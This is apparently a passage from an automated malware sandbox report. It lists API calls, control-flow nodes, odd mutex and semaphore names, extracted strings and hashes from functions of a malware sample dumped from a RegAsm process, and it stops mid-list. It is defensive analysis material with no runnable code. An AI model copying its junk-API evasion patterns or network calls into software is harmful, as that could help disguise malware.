                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B658
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000000C4,00000000,?,?,?,?,?,?,0040D85A,00000001,?,00000000), ref: 0040B673
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B67B
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B682
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B68E
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXq1fl7liz,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B699
                                                                • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B6A4
                                                                • RegOpenKeyExA.ADVAPI32(80000001,reg2tjqpp66,00000000,00020019,?,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000), ref: 0040B6BF
                                                                • SetEnvironmentVariableA.KERNEL32(6x5fpo2a,brwm24fz,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B6D1
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLdy6airfx), ref: 0040B6E2
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B6ED
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B6F3
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_ttjc6yhy), ref: 0040B700
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B731
                                                                • LocalFree.KERNELBASE(00000000,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B738
                                                                • LocalAlloc.KERNEL32(00000040,00000400,?,?,?,?,?,?,0040D85A,00000001,?), ref: 0040B76E
                                                                • ReadFile.KERNEL32(?,0040D85A,00000000,?,00000000,?,?,?,?,?,?,0040D85A,00000001,?), ref: 0040B834
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,0040D85A,00000001,?), ref: 0040B83F
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0040D85A,00000001,?), ref: 0040B84E
                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0040D85A,00000001,?), ref: 0040B85D
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0040D85A,00000001,?), ref: 0040B866
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0040D85A,00000001,?), ref: 0040B86F
                                                                • lstrcpyn.KERNEL32(00000000,00000001,00000001,?,?,?,?,?,?,0040D85A,00000001,?), ref: 0040B8DB
                                                                • LocalFree.KERNEL32(00000001,?,?,?,?,?,?,0040D85A,00000001,?), ref: 0040B8F0
                                                                • InternetSetOptionW.WININET(00000000,00000006,00007530,00000004), ref: 0040B924
                                                                • InternetSetOptionW.WININET(00000000,00000005,0007A120,00000004), ref: 0040B933
                                                                • HttpOpenRequestW.WININET(00000000,?,00000000,00000000,0040D85A,00C00000,00000001), ref: 0040B993
                                                                • HttpSendRequestW.WININET(?,00000001,00000000), ref: 0040B9BC
                                                                • InternetCloseHandle.WININET(?), ref: 0040B9E7
                                                                • InternetCloseHandle.WININET(0040D85A), ref: 0040B9F3
                                                                • InternetCloseHandle.WININET(00000000), ref: 0040B9FA
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLdx9pgteu), ref: 0040BA0B
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040BA16
                                                                • GetLastError.KERNEL32 ref: 0040BA25
                                                                • CreateSemaphoreA.KERNEL32(00000002,00000002,00000001,SMPHR_j20db5mn), ref: 0040BA35
                                                                • GetLastError.KERNEL32 ref: 0040BA3D
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040BA44
                                                                • SetEnvironmentVariableA.KERNEL32(fhy8sjsv,4s3kcx8g), ref: 0040BA64
                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001), ref: 0040BA86
                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001), ref: 0040BAC1
                                                                • LocalFree.KERNEL32(00000000), ref: 0040BAD2
                                                                • LocalFree.KERNEL32(?), ref: 0040BADB
                                                                • LocalFree.KERNELBASE(00000000), ref: 0040BAE2
                                                                • LocalFree.KERNELBASE(00000000), ref: 0040BAEB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$Free$Semaphore$Create$AllocCloseErrorHandleInternetLast$Release$File$ByteCharEnvironmentHttpMultiMutexOpenOptionRequestVariableWidelstrlen$DeleteMappingReadSendlstrcpyn
                                                                • String ID: (#A$0u$4s3kcx8g$6x5fpo2a$MTXq1fl7liz$MrBidenNeverKnow$SMPHR_j20db5mn$SMPHR_ttjc6yhy$XMLdx9pgteu$XMLdy6airfx$b8etrqg1$brwm24fz$fhy8sjsv$gfhqzgow$reg2tjqpp66$s
                                                                • API String ID: 4222297618-715751668
                                                                • Opcode ID: 0cde41b0703500a6712a101e17e9bc1e4f1da66ce9b22e8aa7967f1d5ee893bb
                                                                • Instruction ID: ae774724f0a658663828da31d9f16874f33cbc708ec99354ff02961bfa0b7f1b
                                                                • Opcode Fuzzy Hash: 0cde41b0703500a6712a101e17e9bc1e4f1da66ce9b22e8aa7967f1d5ee893bb
                                                                • Instruction Fuzzy Hash: 3B227275A00605EBDB109FA4DC45FEE7BB5FF88304F10813AF605A72A1DB799D418BA8
                                                                Function 0040F23A Relevance: 117.5, APIs: 47, Strings: 20, Instructions: 231timesynchronizationregistryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 909 40f23a-40f271 lstrlenA * 2 911 40f273-40f279 909->911 912 40f28e-40f31f CreateEventA SetEvent ResetEvent CreateFileMappingW GetLastError CloseHandle OutputDebugStringA CreateWaitableTimerA CancelWaitableTimer CreateWaitableTimerA RegOpenKeyExA 909->912 913 40f280-40f289 call 40dc05 911->913 914 40f27b-40f27e 911->914 915 40f321-40f328 CancelWaitableTimer 912->915 916 40f32a-40f33f RegOpenKeyExA 912->916 913->912 914->912 918 40f345-40f3a4 FindFirstFileA FindClose CreateSemaphoreA ReleaseSemaphore GetLastError LocalAlloc LocalFree CreateMutexA 915->918 916->918 919 40f3a6-40f3b8 ReleaseMutex OutputDebugStringA 918->919 920 40f3ba-40f3c4 SetEnvironmentVariableA 918->920 921 40f3ca-40f3cc 919->921 920->921 922 40f405-40f46f CreateSemaphoreA ReleaseSemaphore CreateEventA SetEvent ResetEvent CreateFileMappingW CloseHandle GetLastError CreateMutexA 921->922 923 40f3ce-40f3d4 921->923 925 40f471-40f474 GetLastError ReleaseMutex 922->925 926 40f47a-40f4cf FindFirstFileA FindClose CreateWaitableTimerA GetLastError CancelWaitableTimer CreateSemaphoreA GetLastError ReleaseSemaphore 922->926 923->922 924 40f3d6-40f3d8 923->924 929 40f3da-40f3dd 924->929 925->926 927 40f4e1-40f4f0 GlobalFree 926->927 928 40f4d1-40f4db SetEnvironmentVariableA 926->928 928->927 930 40f3e5-40f3e7 929->930 931 40f3df-40f3e3 929->931 932 40f3e9-40f3ed 930->932 933 40f3ef 930->933 931->929 931->930 934 40f3f1-40f3f3 932->934 933->934 934->922 935 40f3f5-40f400 call 40dc05 934->935 935->922
                                                                APIs
                                                                • lstrlenA.KERNEL32(00411AA0,00000000,00000000,00000000), ref: 0040F257
                                                                • lstrlenA.KERNEL32(00000000), ref: 0040F25C
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_m3dn2s7y), ref: 0040F299
                                                                • SetEvent.KERNEL32(00000000), ref: 0040F2A2
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040F2A9
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00001073,00000000), ref: 0040F2BD
                                                                • GetLastError.KERNEL32(?,0040B89F), ref: 0040F2C5
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040F2CC
                                                                • OutputDebugStringA.KERNEL32(tfr31hduf), ref: 0040F2D7
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_01xouty6), ref: 0040F2EC
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040F2EF
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_omszadh6), ref: 0040F2FE
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regmklpuiuh,00000000,00020019,?), ref: 0040F317
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040F322
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regd30csegr,00000000,00020019,?), ref: 0040F33F
                                                                • FindFirstFileA.KERNEL32(s_ybyfhnc7,?), ref: 0040F351
                                                                • FindClose.KERNEL32(00000000), ref: 0040F358
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLjf3atpf3), ref: 0040F36F
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F376
                                                                • GetLastError.KERNEL32 ref: 0040F37C
                                                                • LocalAlloc.KERNEL32(00000000,0000006A), ref: 0040F386
                                                                • LocalFree.KERNEL32(00000000), ref: 0040F38D
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTX2vorh5pk), ref: 0040F39C
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 0040F3A7
                                                                • OutputDebugStringA.KERNEL32(thiv6nw54), ref: 0040F3B2
                                                                • SetEnvironmentVariableA.KERNEL32(nn30atpg,upz187bz), ref: 0040F3C4
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLn4nxhm09), ref: 0040F410
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F416
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_kvicewx4), ref: 0040F425
                                                                • SetEvent.KERNEL32(00000000), ref: 0040F42E
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040F435
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000007D8,00000000), ref: 0040F447
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040F44E
                                                                • GetLastError.KERNEL32 ref: 0040F45A
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXmqv692pu), ref: 0040F465
                                                                • GetLastError.KERNEL32 ref: 0040F471
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 0040F474
                                                                • FindFirstFileA.KERNEL32(s_wfr1hzvf,?), ref: 0040F486
                                                                • FindClose.KERNEL32(00000000), ref: 0040F48D
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_ny9sufs2), ref: 0040F49C
                                                                • GetLastError.KERNEL32 ref: 0040F4A4
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040F4A7
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_blz1tv5v), ref: 0040F4B8
                                                                • GetLastError.KERNEL32 ref: 0040F4C0
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F4C7
                                                                • SetEnvironmentVariableA.KERNEL32(sfvxofx6,2c6c0jaa), ref: 0040F4DB
                                                                • GlobalFree.KERNEL32(0040B89F), ref: 0040F4E4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$ErrorEventLastSemaphoreTimerWaitable$Release$CloseFileFindMutex$Cancel$DebugEnvironmentFirstFreeHandleLocalMappingOpenOutputResetStringVariablelstrlen$AllocGlobal
                                                                • String ID: 2c6c0jaa$MTX2vorh5pk$MTXmqv692pu$SMPHR_blz1tv5v$WTMR_01xouty6$WTMR_ny9sufs2$WTMR_omszadh6$XMLjf3atpf3$XMLn4nxhm09$ev_kvicewx4$ev_m3dn2s7y$nn30atpg$regd30csegr$regmklpuiuh$s_wfr1hzvf$s_ybyfhnc7$sfvxofx6$tfr31hduf$thiv6nw54$upz187bz
                                                                • API String ID: 839085604-341165634
                                                                • Opcode ID: 3c95cc083e1e783ef4ce34f62c9194c1c4f456d8505e9daa25524d6dad1f110c
                                                                • Instruction ID: 2ce30f1b42d509e84a1deb79b5eca7e45972eead5cf6da7637876a843b31e3f2
                                                                • Opcode Fuzzy Hash: 3c95cc083e1e783ef4ce34f62c9194c1c4f456d8505e9daa25524d6dad1f110c
                                                                • Instruction Fuzzy Hash: 89719431F40344BBE7202BB09C4DFDA3E68EB8CB51F154136FB05E65E0CAB849848A6D
                                                                Function 0040F4F1 Relevance: 114.0, APIs: 39, Strings: 26, Instructions: 200synchronizationregistrytimeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_ctoy85uy), ref: 0040F508
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F512
                                                                • GetLastError.KERNEL32 ref: 0040F51C
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_w1v6gq3f), ref: 0040F52B
                                                                • SetEvent.KERNEL32(00000000), ref: 0040F534
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040F53B
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXjac2h9rp), ref: 0040F548
                                                                • OutputDebugStringA.KERNEL32(tumyok3ra), ref: 0040F55F
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 0040F562
                                                                • SetEnvironmentVariableA.KERNELBASE(megabt3k,y9hcww4j), ref: 0040F572
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000673,00000000), ref: 0040F58A
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 0040F593
                                                                • LocalAlloc.KERNEL32(00000000,00000E13), ref: 0040F59C
                                                                • LocalFree.KERNEL32(00000000), ref: 0040F5A3
                                                                • FindFirstFileA.KERNEL32(s_ji847msw,?), ref: 0040F5B5
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000973,00000000), ref: 0040F5E8
                                                                • OutputDebugStringA.KERNEL32(tsvokt7xn), ref: 0040F5F1
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040F5F4
                                                                • SetEnvironmentVariableA.KERNEL32(fxvrzngo,9h1ax6df), ref: 0040F606
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_iadc4qpr), ref: 0040F611
                                                                • SetEnvironmentVariableA.KERNEL32(stgaai7d,b73laros), ref: 0040F623
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040F62A
                                                                • OutputDebugStringA.KERNEL32(tqx0oz2ay), ref: 0040F63C
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXuwyp0mzf), ref: 0040F647
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 0040F652
                                                                • OutputDebugStringA.KERNEL32(tzrixxlap), ref: 0040F65F
                                                                • OutputDebugStringA.KERNEL32(th0zjxe72), ref: 0040F666
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_apuc3cyk), ref: 0040F671
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F67B
                                                                • OutputDebugStringA.KERNEL32(tdv2ywoqz), ref: 0040F68A
                                                                • SetEnvironmentVariableA.KERNEL32(gwixf5pi,f757up8d), ref: 0040F698
                                                                • FindFirstFileA.KERNEL32(s_f8ads0ue,?), ref: 0040F6A6
                                                                • FindClose.KERNEL32(00000000), ref: 0040F6AD
                                                                • LocalAlloc.KERNEL32(00000000,00000B22), ref: 0040F6B9
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regag1solu3,00000000,00020019,?), ref: 0040F6DD
                                                                • LocalFree.KERNEL32(00000000), ref: 0040F6E0
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regzaymxyte,00000000,00020019,?), ref: 0040F6F8
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_uhthxy03), ref: 0040F702
                                                                • RegQueryValueExW.KERNEL32(?,00000000,00000001,?,00000104), ref: 0040F742
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$DebugOutputString$EnvironmentFileFindLocalMutexReleaseSemaphoreVariable$CloseEventTimerWaitable$AllocFirstFreeMappingOpen$CancelChangeErrorHandleLastNotificationQueryResetValue
                                                                • String ID: 9h1ax6df$MTXjac2h9rp$MTXuwyp0mzf$SMPHR_apuc3cyk$SMPHR_ctoy85uy$WTMR_iadc4qpr$WTMR_uhthxy03$b73laros$ev_w1v6gq3f$f757up8d$fxvrzngo$gwixf5pi$megabt3k$regag1solu3$regzaymxyte$s_f8ads0ue$s_ji847msw$stgaai7d$t5qdz6127$tdv2ywoqz$th0zjxe72$tqx0oz2ay$tsvokt7xn$tumyok3ra$tzrixxlap$y9hcww4j
                                                                • API String ID: 613056492-3819321733
                                                                • Opcode ID: 8ee59bd8b346564f920efe36f4d1ca2b80084bbecf4d62136ef6df6ad897b689
                                                                • Instruction ID: 6483b53d7b41781449c88bfde164218c53f2c738c47ea40cad8e95de9368aef3
                                                                • Opcode Fuzzy Hash: 8ee59bd8b346564f920efe36f4d1ca2b80084bbecf4d62136ef6df6ad897b689
                                                                • Instruction Fuzzy Hash: CE518371A40354BBD7206BA19C4DFEB3E7DEBC9B51F104036F705A25E1CAB849818A7D
                                                                Function 0040F012 Relevance: 106.9, APIs: 41, Strings: 20, Instructions: 181synchronizationtimememoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • lstrlenW.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F02F
                                                                • lstrlenW.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F034
                                                                • LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,74DF2F20), ref: 0040F04D
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,74DF2F20), ref: 0040F06C
                                                                • FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F073
                                                                • LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,74DF2F20), ref: 0040F07F
                                                                • GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F08D
                                                                • LocalFree.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F090
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
                                                                • CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0A5
                                                                • OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,74DF2F20), ref: 0040F0B6
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,74DF2F20), ref: 0040F0C3
                                                                • SetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0CC
                                                                • ResetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0D3
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,74DF2F20), ref: 0040F0E2
                                                                • SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,74DF2F20), ref: 0040F0FF
                                                                • ReleaseMutex.KERNEL32(?,?,00000000,?,74DF2F20), ref: 0040F104
                                                                • SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,74DF2F20), ref: 0040F114
                                                                • GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F118
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
                                                                • GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F139
                                                                • CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F140
                                                                • OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,74DF2F20), ref: 0040F14B
                                                                • GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F150
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000005D6,00000000,?,00000000,?,74DF2F20), ref: 0040F165
                                                                • FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F16C
                                                                • OutputDebugStringA.KERNEL32(tv49i65z7,?,00000000,?,74DF2F20), ref: 0040F177
                                                                • FindFirstFileA.KERNEL32(s_t4ckbkwe,?,?,00000000,?,74DF2F20), ref: 0040F185
                                                                • FindClose.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F18C
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_qjkqlbwl), ref: 0040F1A1
                                                                • OutputDebugStringA.KERNELBASE(t9kx5wueg,?,00000000,?,74DF2F20), ref: 0040F1AA
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,74DF2F20), ref: 0040F1B7
                                                                • SetEnvironmentVariableA.KERNEL32(b4j4f6xx,jcezxitk,?,00000000,?,74DF2F20), ref: 0040F1C7
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLamfolgz0), ref: 0040F1D8
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,74DF2F20), ref: 0040F1E0
                                                                • OutputDebugStringA.KERNEL32(t1v6z4di9,?,00000000,?,74DF2F20), ref: 0040F1E7
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXdxglk35i,?,00000000,?,74DF2F20), ref: 0040F1F0
                                                                • ReleaseMutex.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F1FB
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regwog66qaw,00000000,00020019,?,?,00000000,?,74DF2F20), ref: 0040F217
                                                                • LocalAlloc.KERNEL32(00000000,00000461,?,00000000,?,74DF2F20), ref: 0040F223
                                                                • GlobalFree.KERNEL32(?), ref: 0040F22C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$DebugOutputString$ErrorFindLastLocalMutexReleaseSemaphoreTimerWaitable$AllocCloseEnvironmentEventFileVariable$CancelChangeFreeMappingNotificationlstrlen$FirstGlobalOpenReset
                                                                • String ID: 54dhluqg$87xo3fjd$MTXdxglk35i$MTXid6eg7kl$SMPHR_qjkqlbwl$WTMR_b67hznar$WTMR_pg3esy2g$XMLamfolgz0$b4j4f6xx$ev_n39w6qzp$jcezxitk$kswx2kex$mjtppkej$regwog66qaw$s_t4ckbkwe$t1v6z4di9$t26t01mzg$t7fwgbo5x$t9kx5wueg$tv49i65z7
                                                                • API String ID: 2403692898-2560767515
                                                                • Opcode ID: b76ec184953812a59086e8b359a0a5680b3fda753aa7ad5c655f3d90c0208f22
                                                                • Instruction ID: 8ff221f86da20beec2bde5ea451d711bc06f1952f8edd64612603dbb9fe3ce86
                                                                • Opcode Fuzzy Hash: b76ec184953812a59086e8b359a0a5680b3fda753aa7ad5c655f3d90c0208f22
                                                                • Instruction Fuzzy Hash: AA516475F40354BBD7206BE0DC89FDE7F68AB88B91F114072F705A65E0CAB85D808A6C
                                                                Function 0040DC49 Relevance: 89.4, APIs: 31, Strings: 20, Instructions: 157timeregistryfileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regduvy6vjh,00000000,00020019,?,74DE9350,74DE7CD0,74E04B60), ref: 0040DC6C
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_iel5vn6f), ref: 0040DC7B
                                                                • GetLastError.KERNEL32 ref: 0040DC89
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040DC8C
                                                                • FindFirstFileA.KERNEL32(s_4o4wkk8x,?), ref: 0040DC9E
                                                                • FindClose.KERNEL32(00000000), ref: 0040DCA5
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XML0ps9kk75), ref: 0040DCB6
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040DCC1
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_co8m4cgj), ref: 0040DCD2
                                                                • SetEvent.KERNEL32(00000000), ref: 0040DCDB
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040DCE2
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_yqgz522c), ref: 0040DCF3
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040DCFE
                                                                • GetLastError.KERNEL32 ref: 0040DD08
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXphqqzlgp), ref: 0040DD13
                                                                • OutputDebugStringA.KERNEL32(ttljfcwbf), ref: 0040DD24
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 0040DD2B
                                                                • SetEnvironmentVariableA.KERNEL32(8b5m7j2t,j365hmj6), ref: 0040DD3B
                                                                • SetEnvironmentVariableA.KERNEL32(pogkjh2o,ud8qanm7), ref: 0040DD53
                                                                • SetEnvironmentVariableA.KERNEL32(6ajv6zs7,1ozgzhys), ref: 0040DD5F
                                                                • lstrlenA.KERNEL32(23b7de51bb42a569733f1e26dbce63ba), ref: 0040DD84
                                                                • FindFirstFileA.KERNEL32(s_knj6a81k,?), ref: 0040DDB7
                                                                • FindClose.KERNEL32(00000000), ref: 0040DDBE
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_ksisnpxu), ref: 0040DDCF
                                                                • RegOpenKeyExA.ADVAPI32(80000001,reg5pqwtshe,00000000,00020019,?), ref: 0040DDEB
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040DDF5
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_sh8nllc8), ref: 0040DE03
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040DE0E
                                                                • OutputDebugStringA.KERNEL32(tv82wggk6), ref: 0040DE19
                                                                • GetLastError.KERNEL32 ref: 0040DE1F
                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,000003F2,00000000), ref: 0040DE31
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$Semaphore$FindReleaseTimerWaitable$EnvironmentErrorEventFileLastVariable$CancelCloseDebugFirstMutexOpenOutputString$MappingResetlstrlen
                                                                • String ID: 1ozgzhys$23b7de51bb42a569733f1e26dbce63ba$6ajv6zs7$8b5m7j2t$MTXphqqzlgp$SMPHR_ksisnpxu$SMPHR_yqgz522c$WTMR_iel5vn6f$WTMR_sh8nllc8$XML0ps9kk75$ev_co8m4cgj$j365hmj6$pogkjh2o$reg5pqwtshe$regduvy6vjh$s_4o4wkk8x$s_knj6a81k$ttljfcwbf$tv82wggk6$ud8qanm7
                                                                • API String ID: 3259851296-3912164436
                                                                • Opcode ID: be6ab2c12df9f5e642702d95afd0ccde8d9c351724caa074a05ef93a360aa40a
                                                                • Instruction ID: bda606bece26ea8c1538e09a1e2a9020e0ff3cca074c005c4388e99aa4674c8b
                                                                • Opcode Fuzzy Hash: be6ab2c12df9f5e642702d95afd0ccde8d9c351724caa074a05ef93a360aa40a
                                                                • Instruction Fuzzy Hash: 01515475F80354BBE7105BA09C8EFDA3F68AB0CB86F104062F705E65E1D6A85AC4876D
                                                                Function 0040E179 Relevance: 68.4, APIs: 25, Strings: 14, Instructions: 129registryfilesynchronizationCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_y69yttl7,00000000,00000000,00000000), ref: 0040E193
                                                                • SetEvent.KERNEL32(00000000), ref: 0040E19C
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040E1A3
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTX3t1mxx1o), ref: 0040E1B0
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 0040E1C1
